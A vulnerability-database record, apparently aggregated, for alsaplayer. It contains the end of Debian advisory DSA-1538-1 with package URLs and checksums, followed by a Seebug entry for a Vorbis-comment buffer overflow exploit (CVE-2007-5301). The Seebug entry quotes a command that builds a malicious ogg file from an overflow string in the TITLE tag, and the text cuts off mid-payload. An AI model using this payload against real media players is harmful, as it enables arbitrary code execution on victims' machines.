http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-xosd_0.99.76-9+etch1_alpha.deb\n Size/MD5 checksum: 28082 c66cc4df7b809c81df49de084b462205\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-daemon_0.99.76-9+etch1_alpha.deb\n Size/MD5 checksum: 27270 6f75fda99af97920257383affe3c075f\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-jack_0.99.76-9+etch1_alpha.deb\n Size/MD5 checksum: 30272 46817a06719f8becbeb69b9359d4d91a\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-oss_0.99.76-9+etch1_alpha.deb\n Size/MD5 checksum: 25590 bb7c7149b6757eceb15357472bb4e2b6\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-common_0.99.76-9+etch1_alpha.deb\n Size/MD5 checksum: 195438 440ce88bb7f9a2d5b2a3e4bc0c35657b\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-esd_0.99.76-9+etch1_alpha.deb\n Size/MD5 checksum: 25420 4bc13bef3dab2646be6750fdd296358d\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-nas_0.99.76-9+etch1_alpha.deb\n Size/MD5 checksum: 27608 483288f19e1fe342240162cfa150a02d\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-gtk_0.99.76-9+etch1_alpha.deb\n Size/MD5 checksum: 137782 0b52ae9bc30a1314834e7ef5107f3659\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer0_0.99.76-9+etch1_alpha.deb\n Size/MD5 checksum: 31896 6f1227ba21196977efc12f41dfb30c0a\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer-dev_0.99.76-9+etch1_alpha.deb\n Size/MD5 checksum: 83198 edb8f259c9817a975f0d87f99108697f\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-text_0.99.76-9+etch1_alpha.deb\n Size/MD5 checksum: 28586 1af7443e262e60c7a38380124c2b488b\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-daemon_0.99.76-9+etch1_amd64.deb\n Size/MD5 checksum: 26924 a35d711c0e01c370415d59549b8a5f23\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-gtk_0.99.76-9+etch1_amd64.deb\n Size/MD5 checksum: 121774 4e04fcd7739a1905e48ba49fda0a807b\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-common_0.99.76-9+etch1_amd64.deb\n Size/MD5 checksum: 163868 8bef80d9dc227726d2f2024549265bd9\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-oss_0.99.76-9+etch1_amd64.deb\n Size/MD5 checksum: 25192 7157a8d0c576f791154d85d305d5ee4e\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-jack_0.99.76-9+etch1_amd64.deb\n Size/MD5 checksum: 28990 20a25a4f3fbb7635fc92f4bd3db34123\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-text_0.99.76-9+etch1_amd64.deb\n Size/MD5 checksum: 27816 3e7b0fd06c61fb07636e9a8ad4223925\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-xosd_0.99.76-9+etch1_amd64.deb\n Size/MD5 checksum: 27596 a030d22d8d0a04f5c944e4f1acd95ad0\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-alsa_0.99.76-9+etch1_amd64.deb\n Size/MD5 checksum: 26884 4e2f9a0a5570680075d8e723ded3af4d\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-nas_0.99.76-9+etch1_amd64.deb\n Size/MD5 checksum: 27050 f1e36292510e1c6800381c1687de72f2\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer0_0.99.76-9+etch1_amd64.deb\n Size/MD5 checksum: 31348 e2e95c3d77565abcb77fc3016ac94318\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer-dev_0.99.76-9+etch1_amd64.deb\n Size/MD5 checksum: 82202 47f4dd3eac22823b20eac1d5ac2a593c\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-esd_0.99.76-9+etch1_amd64.deb\n Size/MD5 checksum: 25118 ddea153c747bbac0286b2fe9708da9b4\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-text_0.99.76-9+etch1_arm.deb\n Size/MD5 checksum: 27736 86b887e84550c7288c773fc8a888dfb7\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-alsa_0.99.76-9+etch1_arm.deb\n Size/MD5 checksum: 26672 1dc88ad32d415f5a2c6624b69e7998ca\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-nas_0.99.76-9+etch1_arm.deb\n Size/MD5 checksum: 27216 736ce1ccaafae5f9e3625dbdf8b5899d\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-gtk_0.99.76-9+etch1_arm.deb\n Size/MD5 checksum: 120772 4aefd3462f4256965914286c1a7061e8\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer-dev_0.99.76-9+etch1_arm.deb\n Size/MD5 checksum: 83954 48d8e598299a15b90b61a920e141ed85\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-daemon_0.99.76-9+etch1_arm.deb\n Size/MD5 checksum: 26752 f9de177fea822cbf3080d4edacc74db6\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-jack_0.99.76-9+etch1_arm.deb\n Size/MD5 checksum: 28656 05d55679345622f1a87ff2f1cca7e5bd\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-xosd_0.99.76-9+etch1_arm.deb\n Size/MD5 checksum: 27358 dfa10d528760e3e9de65c20ea9d9dae6\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-oss_0.99.76-9+etch1_arm.deb\n Size/MD5 checksum: 25152 b1c6124426d3193df76eaf30d434c8bb\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-common_0.99.76-9+etch1_arm.deb\n Size/MD5 checksum: 173496 76c2bfe4990607494b9e6d39de7c394c\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-esd_0.99.76-9+etch1_arm.deb\n Size/MD5 checksum: 25004 f9298a89ec2e3cf70f255d6a0dedd22b\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer0_0.99.76-9+etch1_arm.deb\n Size/MD5 checksum: 29410 45c2839bd4b65d5fbc6ad6fda9761f96\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-jack_0.99.76-9+etch1_hppa.deb\n Size/MD5 checksum: 30830 d32c6b62cc1d4a50af1b2f340c60e295\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-alsa_0.99.76-9+etch1_hppa.deb\n Size/MD5 checksum: 27870 46dff50cec7b6122ad8f056e42e07bf0\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-xosd_0.99.76-9+etch1_hppa.deb\n Size/MD5 checksum: 28772 2aa591d9ebe3f8e5a7996a31fae9f093\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-nas_0.99.76-9+etch1_hppa.deb\n Size/MD5 checksum: 27926 604e9ddc8a8e48031934c1d8ff44278f\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer0_0.99.76-9+etch1_hppa.deb\n Size/MD5 checksum: 31560 956ddd8afc906f9c1ef658348d3eedf0\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-oss_0.99.76-9+etch1_hppa.deb\n Size/MD5 checksum: 25962 3ebcd9cc144bb8386a1ca0f9a410985d\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-text_0.99.76-9+etch1_hppa.deb\n Size/MD5 checksum: 29106 71dcd89706a5d8862d20228f3a65d9d1\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-gtk_0.99.76-9+etch1_hppa.deb\n Size/MD5 checksum: 139484 ed32063973b85fb4b22d7dc0fe5f1eba\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-daemon_0.99.76-9+etch1_hppa.deb\n Size/MD5 checksum: 27858 84a05b131e76039bb03b854428cd6ed9\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-common_0.99.76-9+etch1_hppa.deb\n Size/MD5 checksum: 191314 094ec3d9963ff0641a5748e51da11592\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-esd_0.99.76-9+etch1_hppa.deb\n Size/MD5 checksum: 25812 5e7339d56deb8c88cd83f83895a716c5\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer-dev_0.99.76-9+etch1_hppa.deb\n Size/MD5 checksum: 85944 8c484572699fd8e8ae9e437c8c8f0777\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer0_0.99.76-9+etch1_i386.deb\n Size/MD5 checksum: 30404 152b14037ca04c15f98d61da207d8d46\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-text_0.99.76-9+etch1_i386.deb\n Size/MD5 checksum: 28100 f1ef493cd0e41107102a7d552b83563c\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-nas_0.99.76-9+etch1_i386.deb\n Size/MD5 checksum: 26938 9fd4b50433e0e8059e841156d89265c8\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer-dev_0.99.76-9+etch1_i386.deb\n Size/MD5 checksum: 81112 63d46351fcfaf549e0602289d9fd7139\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-oss_0.99.76-9+etch1_i386.deb\n Size/MD5 checksum: 25102 2b54d8b1f00a371d22b59d83e5cde354\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-gtk_0.99.76-9+etch1_i386.deb\n Size/MD5 checksum: 115288 902924f6ef4f2e63b66b183dc0c35334\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-daemon_0.99.76-9+etch1_i386.deb\n Size/MD5 checksum: 26996 9d0e04a29f76e31f8b076ab3a689a23f\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-alsa_0.99.76-9+etch1_i386.deb\n Size/MD5 checksum: 26732 a4c34cf4a0ab302a9ec079830bc078a5\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-jack_0.99.76-9+etch1_i386.deb\n Size/MD5 checksum: 28900 9153f6bcfa7b63b15a48f28a599bbc72\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-common_0.99.76-9+etch1_i386.deb\n Size/MD5 checksum: 158866 c35adec287030905bf0db4e27ab81d63\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-xosd_0.99.76-9+etch1_i386.deb\n Size/MD5 checksum: 27682 122a2eaf526f4566d7a7486900bf31b3\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-esd_0.99.76-9+etch1_i386.deb\n Size/MD5 checksum: 24994 1a43a121d1a49ca6873ba5095d859e62\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-esd_0.99.76-9+etch1_ia64.deb\n Size/MD5 checksum: 26008 b582458d4fd4c5a0b38bab8b2f0459b9\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-text_0.99.76-9+etch1_ia64.deb\n Size/MD5 checksum: 29332 5f4ccdc8009a1370188025e7efba87eb\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-xosd_0.99.76-9+etch1_ia64.deb\n Size/MD5 checksum: 28878 dc628fa779e8485c9c3dab8363d5726c\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-nas_0.99.76-9+etch1_ia64.deb\n Size/MD5 checksum: 29486 3035fc70c59b1d1edd17725987f19bad\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-oss_0.99.76-9+etch1_ia64.deb\n Size/MD5 checksum: 26340 6db7a892db68580708265873f6ce52b2\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-jack_0.99.76-9+etch1_ia64.deb\n Size/MD5 checksum: 32072 20a46904c43bb27f793bcbbd38079156\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-alsa_0.99.76-9+etch1_ia64.deb\n Size/MD5 checksum: 28608 467d81086aa8141c67490d0c7b92f9e4\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer-dev_0.99.76-9+etch1_ia64.deb\n Size/MD5 checksum: 81542 5d309e66d4abe81b83e1e086575d10f5\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-common_0.99.76-9+etch1_ia64.deb\n Size/MD5 checksum: 239982 8c1cf0558be5c8735b41160db61be0d3\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer0_0.99.76-9+etch1_ia64.deb\n Size/MD5 checksum: 33344 6b6c4685c617583e6a7e2619bc3be82c\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-daemon_0.99.76-9+etch1_ia64.deb\n Size/MD5 checksum: 28184 2fe8caf134eb15304354c3796e453a35\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-gtk_0.99.76-9+etch1_ia64.deb\n Size/MD5 checksum: 164272 48f8eb0310511c326642264a8a3cb63d\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-common_0.99.76-9+etch1_mips.deb\n Size/MD5 checksum: 165842 b16d5d2344a40bc23ab0e03094669839\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-xosd_0.99.76-9+etch1_mips.deb\n Size/MD5 checksum: 27652 0a22b61200a7a29553c8ee85dd6a4f07\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-nas_0.99.76-9+etch1_mips.deb\n Size/MD5 checksum: 27092 f0afc829883f7f794b7d1675746f7d58\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-text_0.99.76-9+etch1_mips.deb\n Size/MD5 checksum: 28030 c9ae0b3f54a88a4e11cded00fccba67c\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-oss_0.99.76-9+etch1_mips.deb\n Size/MD5 checksum: 25222 a9c8b5bfdafd442d5b286814c2ce680d\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-esd_0.99.76-9+etch1_mips.deb\n Size/MD5 checksum: 25072 07b4f0bf800449ab08c8015650c72776\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-alsa_0.99.76-9+etch1_mips.deb\n Size/MD5 checksum: 26806 16b2d718d3acf15eb383bfd920c10480\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-daemon_0.99.76-9+etch1_mips.deb\n Size/MD5 checksum: 27066 3314a50149ea5dceae3e5467e76c77a0\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer-dev_0.99.76-9+etch1_mips.deb\n Size/MD5 checksum: 85636 fefda097b64dab1279376fe0f0b35fdb\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-gtk_0.99.76-9+etch1_mips.deb\n Size/MD5 checksum: 117694 f05708f5ce8cea7bc95e65a54e29f687\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-jack_0.99.76-9+etch1_mips.deb\n Size/MD5 checksum: 29316 02487afba03040ba13ba21c01025b16e\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer0_0.99.76-9+etch1_mips.deb\n Size/MD5 checksum: 29670 c4ddd404db7fd3bdc1ef9a123924418e\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-esd_0.99.76-9+etch1_mipsel.deb\n Size/MD5 checksum: 25148 dabdc1d59a6ae032838dea3353102093\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-alsa_0.99.76-9+etch1_mipsel.deb\n Size/MD5 checksum: 27016 519022c9eb3b6c96a3afa44381f64366\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-text_0.99.76-9+etch1_mipsel.deb\n Size/MD5 checksum: 28224 fbe850b98a06e6b96c7a7bbd733c22f0\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-daemon_0.99.76-9+etch1_mipsel.deb\n Size/MD5 checksum: 27230 7ac0f034f092d2b16857a796def98e2b\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer0_0.99.76-9+etch1_mipsel.deb\n Size/MD5 checksum: 29932 f2da5578e585c2933e8fef32c724aa99\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer-dev_0.99.76-9+etch1_mipsel.deb\n Size/MD5 checksum: 79724 50953a15fe437b4a1a19fa55e2c4bde1\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-common_0.99.76-9+etch1_mipsel.deb\n Size/MD5 checksum: 166054 9b6e96349f4bdd877a8a91b922ee20dc\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-nas_0.99.76-9+etch1_mipsel.deb\n Size/MD5 checksum: 27272 bce2fdec07e84698e63b28317ecf2de6\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-oss_0.99.76-9+etch1_mipsel.deb\n Size/MD5 checksum: 25320 edf3f4f18c7692d0aba2406c9023f322\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-jack_0.99.76-9+etch1_mipsel.deb\n Size/MD5 checksum: 29578 cce9ee89957dcfa6b0f59563d782f3f0\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-xosd_0.99.76-9+etch1_mipsel.deb\n Size/MD5 checksum: 27820 073b5d172915d9a5e57b6732b88be36e\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-gtk_0.99.76-9+etch1_mipsel.deb\n Size/MD5 checksum: 117138 f00516877e9bba7f95bd28daa2ec3735\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-alsa_0.99.76-9+etch1_powerpc.deb\n Size/MD5 checksum: 28758 435a5cd0d7a2154f7de5795c0c639a34\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer-dev_0.99.76-9+etch1_powerpc.deb\n Size/MD5 checksum: 78298 3366d969c599537dbfbd71cfae4e8913\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-text_0.99.76-9+etch1_powerpc.deb\n Size/MD5 checksum: 29788 ed8a38ed1e7f6dc67fd26ed75f1eeded\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-daemon_0.99.76-9+etch1_powerpc.deb\n Size/MD5 checksum: 28890 18b6b83140d2cfa47cfacbf26d254fd6\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-esd_0.99.76-9+etch1_powerpc.deb\n Size/MD5 checksum: 26942 f899716736bbf2a23d3e165f9b0f1bc9\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-xosd_0.99.76-9+etch1_powerpc.deb\n Size/MD5 checksum: 29490 fd8f760c694e23c51f984c136f0271b3\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer0_0.99.76-9+etch1_powerpc.deb\n Size/MD5 checksum: 31720 11b35992acfa3cde29d8edf00c0afb1d\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-jack_0.99.76-9+etch1_powerpc.deb\n Size/MD5 checksum: 31352 0ac9167acdf80a7b80aac9323981f720\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-nas_0.99.76-9+etch1_powerpc.deb\n Size/MD5 checksum: 28974 12bca0fb5a143e69788d19516de3c9a2\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-oss_0.99.76-9+etch1_powerpc.deb\n Size/MD5 checksum: 27172 baeeb5593985237037a4ec5dcd6fc063\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-common_0.99.76-9+etch1_powerpc.deb\n Size/MD5 checksum: 182962 11f96fe3adf8fe0facfebb59a0abc423\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-gtk_0.99.76-9+etch1_powerpc.deb\n Size/MD5 checksum: 130974 b60fc57e8681ecb09e67001c26650df9\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-xosd_0.99.76-9+etch1_s390.deb\n Size/MD5 checksum: 27974 d96577d4acff264dee6487bbedf0a970\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-alsa_0.99.76-9+etch1_s390.deb\n Size/MD5 checksum: 27448 936a4b1de8dc976891f6eb04197fbc92\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-text_0.99.76-9+etch1_s390.deb\n Size/MD5 checksum: 28130 1a37d675e87df59e60823d86bb3b079a\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-esd_0.99.76-9+etch1_s390.deb\n Size/MD5 checksum: 25306 1ec0e9272b6b77231ba4236f3ef5b0c5\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-daemon_0.99.76-9+etch1_s390.deb\n Size/MD5 checksum: 27160 ff4273b1f78919238579ebcbbc361c2d\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-common_0.99.76-9+etch1_s390.deb\n Size/MD5 checksum: 164762 7dc9d8881ce9779e211de5b0f10bfb24\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer-dev_0.99.76-9+etch1_s390.deb\n Size/MD5 checksum: 79096 7d8be3542791df96a6df738b134fa60e\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-gtk_0.99.76-9+etch1_s390.deb\n Size/MD5 checksum: 123358 69ffb56b564c13ef1735fa4d5bf45725\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-jack_0.99.76-9+etch1_s390.deb\n Size/MD5 checksum: 29786 1707fbd54e4782fc1c4a756c9b3b1be8\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-nas_0.99.76-9+etch1_s390.deb\n Size/MD5 checksum: 27404 df369a2d65ceca9281b6e9f42eb13080\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-oss_0.99.76-9+etch1_s390.deb\n Size/MD5 checksum: 25458 f7148876d165801bddea3f8370d77cff\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer0_0.99.76-9+etch1_s390.deb\n Size/MD5 checksum: 31298 799599d2ee4ba08d0024f1ae14bf2b71\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer-dev_0.99.76-9+etch1_sparc.deb\n Size/MD5 checksum: 77596 b082cb4dc6228cd4dd604b6080d80fc0\n http://security.debian.org/pool/updates/main/a/alsaplayer/libalsaplayer0_0.99.76-9+etch1_sparc.deb\n Size/MD5 checksum: 29638 7ca739cc15f4328730f588707267c973\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-daemon_0.99.76-9+etch1_sparc.deb\n Size/MD5 checksum: 26900 177580129b807bd9fe97f82c7752039b\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-gtk_0.99.76-9+etch1_sparc.deb\n Size/MD5 checksum: 118620 63df839b875a82977feac0bb6800fb23\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-nas_0.99.76-9+etch1_sparc.deb\n Size/MD5 checksum: 26862 ccae6c55156046f553c8aa4f0baa4232\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-alsa_0.99.76-9+etch1_sparc.deb\n Size/MD5 checksum: 26764 6481a032bf418dd73f7da67f0874def0\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-jack_0.99.76-9+etch1_sparc.deb\n Size/MD5 checksum: 29272 36d7b51e3f48189ada1ff54ccb59a5d0\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-xosd_0.99.76-9+etch1_sparc.deb\n Size/MD5 checksum: 27716 76976b49916283774b2a5e3200048ccc\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-common_0.99.76-9+etch1_sparc.deb\n Size/MD5 checksum: 156806 a0c4129dc4d8b94b8baf9a56ead2edf4\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-esd_0.99.76-9+etch1_sparc.deb\n Size/MD5 checksum: 25040 f7c83edbd6586a0feca68de38fab2817\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-oss_0.99.76-9+etch1_sparc.deb\n Size/MD5 checksum: 25132 70717e12ed7d77e82f3a02ad8802c513\n http://security.debian.org/pool/updates/main/a/alsaplayer/alsaplayer-text_0.99.76-9+etch1_sparc.deb\n Size/MD5 checksum: 27858 13cbdbec99958a329403b805d1ba98b3\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2008-04-04T20:27:27", "published": "2008-04-04T20:27:27", "id": "DEBIAN:DSA-1538-1:32D1F", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00108.html", "title": "[SECURITY] [DSA 1538-1] New alsaplayer packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T21:49:04", "description": "No description provided by source.", "published": "2008-04-11T00:00:00", "title": "Alsaplayer < 0.99.80-rc3 Vorbis Input Local Buffer Overflow Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5301"], "modified": "2008-04-11T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-8307", "id": "SSV:8307", "sourceData": "\n I have released this exploit for the alsaplayer bug CVE-2007-5301.\r\n\r\nYou can find all the needed files at http://www.wekk.net/research/CVE-2007-5301/\r\n\r\nWith my modified version of vorbiscomment, you can generate a ogg exploit like this:\r\n\r\nwhats@debian:~$ vorbiscomment.whats -w -t "TITLE=$(perl -e 'print "AAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\r\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBXXXXX\\x77\\xe7\r\n